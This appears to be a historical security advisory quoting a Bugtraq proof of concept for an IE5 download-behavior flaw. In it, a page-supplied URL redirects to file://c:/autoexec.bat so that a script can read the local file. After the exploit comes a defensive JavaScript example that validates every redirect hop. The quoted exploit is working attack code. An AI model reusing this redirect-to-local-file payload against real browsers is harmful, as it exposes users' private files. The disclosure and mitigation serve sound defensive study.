Microsoft IE5 Download Behavior Vulnerability
From Georgi Guninski's post to Bugtraq:

<SCRIPT>
function doit(s) {
  alert("Here is your file:\n" + s);
}
</SCRIPT>
<A ID="oD" STYLE="behavior:url(#default#download)" HREF="javascript:oD.startDownload('http://www.nat.bg/~joro/reject.cgi?autoexec', doit)">Click here to read C:\AUTOEXEC.BAT</A>.
<!-- ("http://www.nat.bg/~joro/reject.cgi?autoexec" just does a HTTP redirect to file://c:/autoexec.bat) -->

Demonstration available at: http://www.nat.bg/~joro/download2.html
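The comment in the post notes that reject.cgi only issues an HTTP redirect to a file:// URL. The following JavaScript is an added example, not code from the post or from Microsoft: it shows the check a client has to repeat on every redirect hop, assuming the intended policy is that a download may only fetch http(s) content from the requesting page's own origin. The names `checkHop` and `validateChain` are hypothetical, and the redirect chains passed to them are constructed sample data.

```javascript
// Added example: validate each redirect hop, not just the first URL.
// Assumption: downloads are limited to http(s) on the page's own origin.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Hypothetical helper: may the hop from currentUrl to locationHeader be followed?
function checkHop(pageOrigin, currentUrl, locationHeader) {
  let target;
  try {
    // Location can be relative, so resolve it against the URL that sent it.
    target = new URL(locationHeader, currentUrl);
  } catch (e) {
    return { ok: false, reason: "unparseable Location" };
  }
  if (!ALLOWED_SCHEMES.has(target.protocol)) {
    return { ok: false, reason: "scheme " + target.protocol + " not allowed" };
  }
  if (target.origin !== pageOrigin) {
    return { ok: false, reason: "cross-origin redirect to " + target.origin };
  }
  return { ok: true, url: target.href };
}

// Walk a recorded chain of Location headers (no network access involved).
function validateChain(pageUrl, requestedUrl, locations, maxHops = 5) {
  const pageOrigin = new URL(pageUrl).origin;
  // The URL handed to the download call is checked like any other hop.
  let result = checkHop(pageOrigin, pageUrl, requestedUrl);
  if (!result.ok) return result;
  if (locations.length > maxHops) {
    return { ok: false, reason: "too many redirects" };
  }
  for (const loc of locations) {
    // A check done only before this loop would miss the redirect target.
    result = checkHop(pageOrigin, result.url, loc);
    if (!result.ok) return result;
  }
  return result;
}
```

The first URL in the post passes the origin check on its own; only re-running the check on the redirect target rejects the chain.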